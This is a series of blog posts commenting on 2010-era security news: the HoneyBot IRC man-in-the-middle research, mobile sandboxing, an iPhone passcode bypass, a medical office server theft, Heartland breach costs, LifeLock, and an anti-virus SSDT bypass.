IRC-Junkie is reporting that researchers at TU Wien (Vienna University of Technology, Austria) have developed a software program that performs a "man-in-the-middle" attack between IRC users causing them to click on malicious links at a 76% click rate. As opposed to impersonating a user and attempting to perform one side of the conversation, this program sits between two users and simply makes changes to the words and inserts malicious links.
The so called "HoneyBot" is capable of influencing the ongoing conversation by “dropping, inserting, or modifying messages” and the researchers assert that “if links (or questions) are inserted into such a conversation, they will seem to originate from a human user” and therefore the click-probability will be “higher than in artificial conversation approaches”.
It seems to me that the high click rate is due to the lack of knowledge that such an attack is even possible and therefore people are not in the least bit suspicious. If HoneyBots become more prevalent, people will be more on guard.
In any case, approach each link cautiously - hover over the link and inspect the URL that is displayed at the bottom of the browser. If you cannot determine exactly where the URL is going to take you, don't click on it.
Another thought, how long before we see this type of attack in the wild on Facebook?
Slate recently published an article entitled, "The End of Malware?" The sub-title is, "How Android, Chrome, and the iPad are shielding us from dastardly programs." The premise trotted out the usual, Windows is insecure; Android, Chrome, and the iPad are more secure because they deploy sandboxing technology, i.e. restricting an application's access to operating system resources.
While this may be a good thing, it is hardly the "end of malware." Not even close.What the author is missing is the intent and motiviation of the bad guys. They go where the money is, i.e. where there is the opportunity to steal cash from people's bank accounts, steal credit card information, steal intellectual property they can sell. At present, these opportunities are minimal on Android, Chrome, and iPads. Once there is critical mass for profitable hacking, you will definitely see an increase in exploits on these devices.
Now even with limited opportunities for profitable hacking we are starting to hear about vulnerabilities on these devices. Just yesterday I wrote about a Massive iPhone Security Issue where passcode protected content on the iPhone can be accessed by simply attaching the device to a computer running Ubuntu or OSX. Therefore, if you lose your iPhone, your passcode protection is useless.
If you need to hear more, check out the June 3 article in the Wall St. Journal, Dark Side Arises for Phone Apps. Here are some key quotes, first on Google:
In one incident, Google pulled dozens of unauthorized mobile-banking apps from its Android Market in December. The apps, priced at $1.50, were made by a developer named "09Droid" and claimed to offer access to accounts at many of the world's banks. Google said it pulled the apps because they violated its trademark policy.
The apps were more useless than malicious, but could have been updated to capture customers' banking credentials, said John Hering, chief executive of Lookout, a mobile security provider. "It is becoming easier for the bad guys to use the app stores," Mr. Hering said.
And on Apple:
Apple vets applications before they appear in its App Store, but risks still exist. In July 2008, Apple pulled a popular game called Aurora Feint from its store after it was discovered to be uploading users' contact lists to the game maker's servers. More recently, it yanked hundreds of apps it said violated its policies, some out of security concerns.
In conclusion, while sandboxing is a good idea, there is no silver bullet when it comes to security.
ReadWriteEnterprise is reporting that:
Content stored on an iPhone 3GS with passcode protection can be accessed without the passcode simply by attaching the device to a computer running the latest version of Ubuntu or a Windows or OSX system running off the shelf software such as iPhone Explorer. This flaw was discovered by Bernd Marienfeld, an information security professional and blogger, last week. Recently, the enterprise has seen a steep increase in the adoption of the iPhone and iPad. But Apple will need to aggressively address security concerns such as these in order to gain and hold market share.
Read the whole article here.
We are constantly amazed at the new levels of creativity criminals apply to achieve their goals. However, sometimes the old-fashioned approaches work just as well. From the Office of Inadequate Security comes this report:
Silicon Valley Eyecare Optometry and Contact Lenses
State: California
Approx. # of Individuals Affected: 40,000
Date of Breach: 4/02/10
Type of Breach: Theft
Location of Breached Information: Network ServerAn FAQ on the firm’s web site says, in part:
What happened?
On Friday morning April 2, 2010 at 5:30 a.m., two burglars broke an outside window to the administrative area of our office at 770 Scott Boulevard in Santa Clara, CA. Our security cameras show the intruders coming through the window, confiscating the computer, and pushing the computer and a plasma TV back out the window of entrance, all within 50 seconds. Our cameras recorded the type of vehicle they were driving. The alarm system was activated and the police were notified. A full police report was filed.What data was stored on the stolen computer server?
The server that was stolen contained our patient data base information. The patient records contain names, addresses, phone numbers, and in some cases social security numbers. E-mail addresses birthdates, family members, medical insurances as well as medical and ocular health information was included. No Optomap retinal images were stored on the system. No credit card information was stored on the system.Was the information secured?
Yes. There were 3 levels of security in place: physical, technical and administrative. Physical security consisted of locked doors, an alarm system to the police office, and surveillance cameras. For technical security, the data was password protected on two levels: a detailed password to access the server and a second password to access the patient data base. Administrative security was in place allowing no public access to the server.Is all of my patient data lost?
No. Our patient data base is backed up nightly and an encrypted copy is stored off-site. We were able to restore our data and retrieve our patient records.
Note that the off-site backup copy of the data is encrypted but the on-site version was not.
DarkReading is reporting:
In a legal settlement over its 2008 security breach, Heartland Payment Systems has agreed to pay up to $41.4 million to MasterCard Worldwide and its card issuers to repay operational costs and fraud losses attributed to the breach.
The article does not state whether this is included in the $139 million they said they set aside in a recent SEC filing. Given that the filing was recent, I would think, yes. As i posted earlier this month, $139 million is a far cry from the initial expected costs of $12 million.
The Phoenix New Times (via Wired) is reporting that LifeLock's CEO Todd Davis's identity was stolen 13 times. That's 12 more than had been previously reported. The question is, who's fault is it?
Clearly from a security perspective, it's not a good idea to display your Social Security Number on billboards and TV advertisements. However, from a marketing perspective it was brilliant. The actual dollar amounts lost due to these identity theft incidents were low. If those costs were simply written off as marketing expenses, it was a good deal for Todd Davis.
On the other hand, the legal expenses LifeLock has incurred are a different matter. I am not sure if the $12 million in legal judgments could also be simply written off as marketing expenses. I previously wrote about the $11 million and $1 million judgments against LifeLock here.
LifeLock's identity theft protection is really limited to automatically posting "Initial Fraud Alerts" with the three consumer credit agencies, Equifax, Experian, and Trans Union.
The actual FTC complaint, in section 18 details the limitations of an "Initial Alert." In other words, there are many ways you can still suffer an identity theft attack with an Initial Alert turned on with all three consumer reporting agencies. Many of these are due to third parties not exercising the due diligence they should.
To my knowledge, only Equifax provides a service that actually enables you to LOCK your account. However, locking is not the silver bullet either as there are forms of identity theft that can be perpetrated without accessing your credit report. And since you can only lock Equifax, you are still vulnerable to Experian or TransUnion being abused. Finally, even if Experian and TransUnion added an easy locking process similar to Equifax's, you would have to pay fees to them as well.
Computerworld is reporting that Heartland Payment Systems' recent quarterly financial filing revealed that the credit card payment processor's expenses related to their 2008 breach of 130 million credit cards have risen to $139.4 million.
This is a far cry from the $12 million CEO Bob Carr said was the appropriate amount to set aside in December 2009 when he settled with American Express for $3.6 million. In January 2010, just one month later, Heartland settled for $60 million with Visa.
The Computerworld article also reports that a recent Ponemon Institute study shows that the average cost per security breach in the U.S. rose to $6.75 million. The "per record' cost is averaging $204.
First, while not to invalidate, or even question, the results of this study, I would like to point out that it was sponsored by PGP Corporation (being acquired by Symantec).
Second, I am not a big fan of averages. See the Flaw of Averages by Sam Savage of Stanford. The point being that you cannot use the average when calculating your risk of the cost of a breach. And Heartland's costs make the point.
Researchers at matousec.com, a security research and consulting group, released a paper describing a vulnerability in the way that anti-virus vendors integrate their products with Windows - System Service Descriptor Table (SSDT). They also built code that exploits this vulnerability which enables them to bypass these anti-virus programs. The Register has a good summary.
My first reaction is "so what?" Anti-virus programs have become almost irrelevant as the primary attack vector has shifted to browser-based applications. On the other hand, this vulnerability could lead to a resurgence of more direct viruses.
Second, how and how quickly will Microsoft and the anti-virus vendors react?
Third, what are the implications for Intel's vPro technology?
Fourth, is there an anti-virus vendor out there that does not use SSDT to integrate with Windows?